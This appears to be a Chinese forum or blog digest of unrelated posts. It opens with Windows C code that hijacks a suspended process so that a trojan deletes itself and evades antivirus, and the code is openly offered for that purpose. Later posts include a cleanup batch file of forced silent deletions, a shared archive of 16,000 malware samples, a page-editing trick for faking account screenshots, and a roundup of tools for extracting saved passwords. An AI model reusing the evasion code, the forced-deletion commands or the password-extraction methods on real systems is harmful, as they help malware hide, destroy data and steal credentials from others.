#include <windows.h>
BOOL DeleteMyself(WCHAR *pHelper)
{
int ret;
WCHAR helper[MAX_PATH];
ZeroMemory(helper, sizeof(helper));
if (pHelper)
wcsncpy(helper, pHelper, MAX_PATH-2);
else
wcscpy(helper, L"calc.exe");
STARTUPINFOW si = {sizeof(STARTUPINFOW),0};
PROCESS_INFORMATION pi;
HANDLE hSYNC = OpenProcess(SYNCHRONIZE, TRUE, GetCurrentProcessId());
if (CreateProcessW(NULL, helper, 0, 0, TRUE, CREATE_SUSPENDED, 0, 0, &si, &pi))
{
CONTEXT ctx = {CONTEXT_FULL,0};
ret = GetThreadContext(pi.hThread, &ctx);
WCHAR MyselfPath[MAX_PATH];
int nPathLen = GetModuleFileNameW(NULL, MyselfPath, MAX_PATH);
struct StackContext
{
DWORD_PTR DeleteFileW;
DWORD_PTR WaitForSingleObject_argv1;
DWORD_PTR WaitForSingleObject_argv2;
DWORD_PTR ExitProcess;
DWORD_PTR DeleteFileW_argv1;
DWORD_PTR shit;
DWORD_PTR ExitProcess_argv1;
}stackctx;
HMODULE hKernel32 = GetModuleHandleW(L"Kernel32.dll");
ctx.Eip = (DWORD_PTR)GetProcAddress(hKernel32, "WaitForSingleObject");
ctx.Esp = (DWORD_PTR)VirtualAllocEx(pi.hProcess, 0, 512*1024, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
ctx.Esp += 256*1024;
stackctx.DeleteFileW = (DWORD_PTR)GetProcAddress(hKernel32, "DeleteFileW");
stackctx.WaitForSingleObject_argv1 = (DWORD_PTR)hSYNC;
stackctx.WaitForSingleObject_argv2 = (DWORD_PTR)-1;
stackctx.ExitProcess = (DWORD_PTR)GetProcAddress(hKernel32, "ExitProcess");
stackctx.DeleteFileW_argv1 = (DWORD_PTR)VirtualAllocEx(pi.hProcess, 0, (nPathLen+1)*sizeof(WCHAR), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
ret = WriteProcessMemory(pi.hProcess, (LPVOID)stackctx.DeleteFileW_argv1, MyselfPath, (nPathLen+1)*sizeof(WCHAR), NULL);
if (!ret) return FALSE;
stackctx.shit = 0;
stackctx.ExitProcess_argv1 = 0;
ret = WriteProcessMemory(pi.hProcess, (LPVOID)(ctx.Esp), &stackctx, sizeof(stackctx), NULL);
if (!ret) return FALSE;
ret = SetThreadContext(pi.hThread, &ctx);
if (!ret) return FALSE;
ResumeThread(pi.hThread);
CloseHandle(pi.hThread);
CloseHandle(pi.hProcess);
return TRUE;
}else
{
return FALSE;
}
}
int main()
{
DeleteMyself(0);
return 0;
}
//2000/xp/2003/vista 上已经测试通过
此代码用于木马在运行完后,在内存中将自己的进程结束,从而躲过杀毒软件的查杀!!慎用!
[查看全文]
浏览器可以浏览网页,可以查看图片、视频,可以保存图片等等功能,但你可能没有想到或没有见到过下面这个功能:访问的页面中包含的图片元素围绕在一起有规律的旋转!
这是如何实现的呢?首先随便打开一个网站,随便一个网站都行!然后复制下面的代码到地址栏中,回车确定,看看发生了什么?
下面是代码!
javascript:R=0; x1=.1; y1=.05; x2=.25; y2=.24; x3=1.6; y3=.24; x4=300; y4=200; x5=300; y5=200; DI=document.images; DIL=DI.length; function A(){for(i=0; i-DIL; i++){DIS=DI[ i ].style; DIS.position='absolute'; DIS.left=Math.sin(R*x1+i*x2+x3)*x4+x5; DIS.top=Math.cos(R*y1+i*y2+y3)*y4+y5}R++}setInterval('A()',5); void(0);
停止:右键刷新。好不好玩?
[查看全文]
今天小吴详解一下清除系统垃圾的批处理
@echo off ( 关闭回显,意思是在屏幕不显示的东东)
echo 正在清除系统垃圾文件,请稍后。。。 (要在屏幕显示的东东)
del /s /f /q %systemdrive%\*.tmp >nul 2>nul
详解:(del删除/s删除其下子目录、/f强制删除只读属性/Q 安静模式)
(>nul 2>nul 是将命令执行时的信息或者错误全部给屏蔽掉)
del /s /f /q %systemdrive%\*.gid >nul 2>nul
del /s /f /q %systemdrive%\*.chk >nul 2>nul
del /s /f /q %systemdrive%\*.old >nul 2>nul
del /s /f /q "%userprofile%\local settings\temp\*.*" >nul 2>nul
del /s /f /q "%userprofile%\recent\*.*" >nul 2>nul
del /s /f /q "%userprofile%\cookies\*.*" >nul 2>nul
del /s /f /q "%userprofile%\local settings\history\*.*" >nul 2>nul
del /s /f /q "%windir%\temp\*.*" >nul 2>nul
del /s /f /q "%windir%\prefetch\*.*" >nul 2>nul
echo 垃圾文件清理完毕! 显示的东东
echo. & pause 暂停一下
注:这是一个用来清除系统垃圾文件的批处理程序。命令其实也是很简单的,主要是用到“del”命令和相关的参数来实现
有关“del”命令的参数大家可以参考“del /?”来得到详细的帮助。
另外还有“%systemdrive%、%userprofile%”。那么它们是什么呢,这些其实是系统变量,也就是系统目录的另一种
表示形式而已。我们可以通过输入“echo %userprofile%”来看看它代表的是系统中的那个目录那么,怎么来看变量目录呢
如下所示,各个目录的变量都出来了
+++++++++++++++++++++++++++++++++++++++++++
Microsoft Windows [版本 6.1.7600]
版权所有 (c) 2009 Microsoft Corporation。保留所有权利。
C:\Users\itnihao>set
ALLUSERSPROFILE=C:\ProgramData
APPDATA=C:\Users\itnihao\AppData\Roaming
CommonProgramFiles=C:\Program Files\Common Files
COMPUTERNAME=ITNIHAO-PC
ComSpec=C:\Windows\system32\cmd.exe
FP_NO_HOST_CHECK=NO
HOMEDRIVE=C:
HOMEPATH=\Users\itnihao
LOCALAPPDATA=C:\Users\itnihao\AppData\Local
LOGONSERVER=\\ITNIHAO-PC
NUMBER_OF_PROCESSORS=2
OS=Windows_NT
Path=C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\
\WindowsPowerShell\v1.0\;C:\Program Files\Common Files\Thunder N
decs
PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
PROCESSOR_ARCHITECTURE=x86
PROCESSOR_IDENTIFIER=x86 Family 15 Model 107 Stepping 2, Authent
PROCESSOR_LEVEL=15
PROCESSOR_REVISION=6b02
ProgramData=C:\ProgramData
ProgramFiles=C:\Program Files
PROMPT=$P$G
PSModulePath=C:\Windows\system32\WindowsPowerShell\v1.0\Modules\
PUBLIC=C:\Users\Public
SESSIONNAME=Console
SystemDrive=C:
SystemRoot=C:\Windows
TEMP=C:\Users\itnihao\AppData\Local\Temp
TMP=C:\Users\itnihao\AppData\Local\Temp
USERDOMAIN=itnihao-PC
USERNAME=itnihao
USERPROFILE=C:\Users\itnihao
windir=C:\Windows
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
。那么其它的也是一样
*.tmp的意思是,这个*号是一个通配符号,它表示的是所有以.tmp为扩展名的文件。大家都明白了吗?
>nul 2>nul的意思是将命令执行时的信息或者错误全部给屏蔽掉。
好了 ,教程做完了,各位也学会了!有什么不懂得,跟帖吧!!
[查看全文]
以下引用:
本人呆着无聊整理了一下这2年的样本,整合到了一起给大家测试杀软之用。。
如出现其他后果 本人不负责哦(16277个样本)其中包括 病毒样本 恶意程序 木马 可疑文件以及更多... 绝对本人整合原创 平时都呼喊自己装备强悍 歧视他人 看看你们装备到底多强悍 小弟如有冒犯之处请多包含 不要口水之类语句 愿意用的就拿去
此次合集里面 并不是16277都报毒。。。(有一些是恶意程序)不要以为报毒率高 就是最好的杀软 同时观测误杀和是否免杀
提示:
样本有风险,下前需谨慎!
如欲测试,请尽量在虚拟机中进行!!!
我的115网络U盘:http://u.115.com/?ac=my
你们自己去下!~
[查看全文]
it你好ASP服务器windows免安装配置版本
使用很简单的 只需要 安装 把你的asp网站文件放在C:\Program Files\小旋风AspWebServer\wwwroot 下面
然后通过ip访问 即可理解使用 同时支持html
淘宝上很多帮大家刷永久会员的 今天就揭穿他们的阴谋 大家说刷永久的是不是看到他给你发的一个图,上面显示他网号到期是多么多么长时间`` 或你远程查看他的到期时间是什么2099年了2058年了`对嘛? 他告诉你是用宽代刷的~??????? 这个就是我用代码改的,在网站上别人可以远程查看到的`` 我也刷到了2099年`呵呵 现在给大家发我真实的到期时间`` 可能有点不清楚``大家放在本地上看就可以了`` 我真正到期时间是2011年5月3号``` 现在告诉大家改自己到期时间的假方法 打开你要修修改有页面,然后把下面代码复制上去就可以改了`` (对付银行等是无效的) javascript:document.body.contentEditable='true'; document.designMode='on'; void 0 然后按回车 3:随意去修改里面的内容吧,改完后输入代码 javascript:document.body.contentEditable='false'; void 0 保存修改结果 怎么样可以看到修改以后的效果了吧,你的到期时间以经变了,这个方法可以在任何网站上做实验,包括百度等```` 大家可以改几个放相册里很好玩的``` 这个是假的技术支持`````````` 嘎嘎~!! |
30秒破解所有密码
案例一:强力查\"*\"工具
打开软件后,将\"X\"图标,直接拖曳到需要查看密码的窗口中就可以了
下载地址: http://work.newhua.com/cfan/200622/xpass.zip
案例二:丢失的ADSL密码
dialupass的使用方法很简单,简单到你只要一运行,就能看到电脑中保存的拨号密码了
下载地址: http://work.newhua.com/cfan/200622/dialupass.rar
我不是ADSL的所以没显示。。哦。。。没有也可以建一个。。。哈哈。。。。刷QB的时候应
该很多用途吧
案例三:找到系统管理员的密码
系统里面有很多帐号,如果经常不用就会忘记了,对于这部分密码,要找回来,同样非常麻烦。Mr.cfan
就把network password recovery 推荐给大家吧。
将软件和汉化包解压至相同目录,运行后就能看到当前系统中的所有帐号信息了。
下载地址:http://www.nirsoft.net/utils/netpass.zip
汉化包:http://www.nirsoft.net/utils/trans/netpass_schinese.zip
案例四:让系统对我透明
若是所以的\"*\"都现出原形,是不是会让你觉得很方便呢?也不顾用拖曳图标了,想看就看,让系统密码
完全“透明”。这可是Mr.cfan强力推荐的软件。同样将软件和汉化包解压至相同目录,运行后,系统就
会自动变得的“透明”,同时,所有“透明”化处理过的程序都会被收集起来
下载地址:http://www.nirsoft.net/utils/astlog.zip
汉化包:http://www.nirsoft.net/utils/trans/astlog_schinese.zip
奇怪,我打开什么信息都没有
案例五:5秒内破解Word/Excel密码
千万别以为你把DOC、XLS文档加了个密码,就万事OK了,现在的软件只要几秒就可以将这些密码摧毁!
要掌握快速破解文档密码的关键是要下载到Office Password Remover 。然后你要做的就是连上网。点
两下鼠标,点击“文件名”后的“打开”按钮,选择加密的文件,然后按下“移除密码”,这时软件会自
动连网(看来前提是你的计算机已经连网了)寻找密钥。如果网速够快,只要几秒
种就会生成没有密码的新文件了。软件在联网的时候会自动发送一些文件头数据,不会泄露你的隐私,
可以放心时使用。
下载地址:http://work.newhua.com/cfan/200622/opr.rar
我自己先新建一个加密doc,,再用这个工具打开。。。
点移除密码。。。它会提示连接服务器。。。等一下就会在桌面生成一个解密过的文件
如果你担心隐私暴露,那么Advanced office password 是你破解office文档密码的另一选择。
下载地址:http://www.onlinedown.net/soft/37776.htm
案例六:破解60种软件的隐藏密码
现在很多软件都采用了密码加密后,保存在文件中的做法,比如flashfxp.outlook 等等,要破解这些加
密方式,最好的办法就是用Multi Password Recovery。它能破解密码的软件达60多种,可以通过
Readme.txt查看到。运行软件后,需要稍等几分钟,软件会自动扫描系统并列出系统信息及部分软件的
密码,如果还需要对其他密码进行破解。点击工具栏的“向导”按钮,然后选择破解的软件,并根据
提示选择软件保存密码文件的数据,就可以了
下载地址:http://www.newhua.com/soft/51824.htm
这个软件功能还真多
案冽七:恢复任意FTP客户端的FTP密码
如你忘记了FTP客户端中保存的N多FTP密码,用上了面的方法都不成了,那恢复起来可是件麻烦事了。只
有用FTP Password Recovery 来解决了。软件是用采用后台监听的方式读取FTP帐户信息的。
第一步:打开软件后,运行FTP客户端。
第二步:将要得到密码的FTP站点及端口号修改为127.0.01 和21
第三步:然后就可以在FTP Password Recovery中看到密码的结果了。
下载地址:http://work.newhua.com/cfan/200622/fpr.zip
(如果出现缺少MSWINSCK.OCX的提示,可以从
http://www.gsmblog.com/freeware/vblib/mswinsck.zip
下载,将其中的文件解压至
c;windows/sysytems32,再运行regsvr32 mswinsck.ocx,就可以运行了)
案例八:找回RAR的密码
你以为用了RAR压缩后,再传送文件时,就会万无一失了吗?。。如果你的密码过于简单,会立刻被
RAR KEY 所破解。打开RAR KEY ,点击“recover”按钮,软件就会自动开始破解。默认软件会使用暴露
破解,使用的是字母及数字,如果需要修改,可以点击工具栏中的settings按钮,在symbol set标签下进
行设置。如果要使用字典破解。只要在Dictionary 标签下勾选Enable dictionary attack并设置好字典
文件就可以了。
下载地址:http://www.newhua.com/soft/9756.htm
刊登内容下载使用过程中注意使用查杀软件查杀
最起码看看有没有*其他恶意插件 !!
[查看全文]
近日,360浏览器置自身用户安全于不顾,私下针对金山网盾做了恶意的技术限制,致使金山网盾安全模块失效,无法正常保护360浏览器用户的浏览安全。问题被披露后,360方面不但没有停止对金山网盾的限制,反而声称是金山网盾出现程序错误,并开始对金山网盾这款完全免费的产品进行公开打压,误导360用户卸载金山网盾,还反称金山在对其进行打击报复。
众所周知,金山是一家拥有20年历史的技术型企业,行事一惯低调,在业界也拥有良好的口碑。对于本次360浏览器对金山网盾的恶性竞争行为最初也仅在自己官方网站发表声明,将事实告知广大用户,却引来360方面一系列的恶语相向。面对360这种混淆视听、试图掩盖自身技术缺陷的不负责任态度,金山不得不再度发表声明如下:
1、作为一个老牌的国内安全厂商,金山互联网安全拥有强大的技术实力以及先进的安全理念,旗下产品线丰富,而且拥有多款免费产品,金山网盾就是其中一款永久免费的安全软件。究其360浏览器恶意打压金山网盾的根源,主要在于金山网盾与360浏览器相比拥有较强的技术优势、良好的用户口碑,再加之日前与国内最大的浏览器傲游的合作,让360受到严重威胁,进而不顾之前与金山的合作关系对金山网盾进行恶意打压。
2、360安全浏览器实为一款“山寨”组装浏览器,无任何核心技术。早在360安全浏览器发布以来,广大网友就已经确定360安全浏览器就是世界之窗的界面修改版。360浏览器自身极不稳定,官方论坛经常出现用户大量反馈,投诉360安全浏览器页面崩溃问题。而且不成熟的集成Sandboxie沙盘将导致用户数据丢失。360浏览器以安全的名义,实则根本没有能力完全保护用户的浏览安全。反而在用户使用金山网盾进行防护的同时,进行强行阻止。这是一种对用户极为不负责任的行为。
3、金山作为一家拥有20年历史的技术型企业,在业界也拥有良好的口碑。而回顾360公司的发展历史,其曾经多次对其他安全厂商如瑞星、卡巴斯基,以及媒体恶语相向、大打出手,给整个安全行业的健康发展造成了非常不良的影响。如果一个公司长期利用恶性竞争、炒作来打压竞争对手,提高自己,注定不会有长远发展,更不用说保护用户利益。
[查看全文]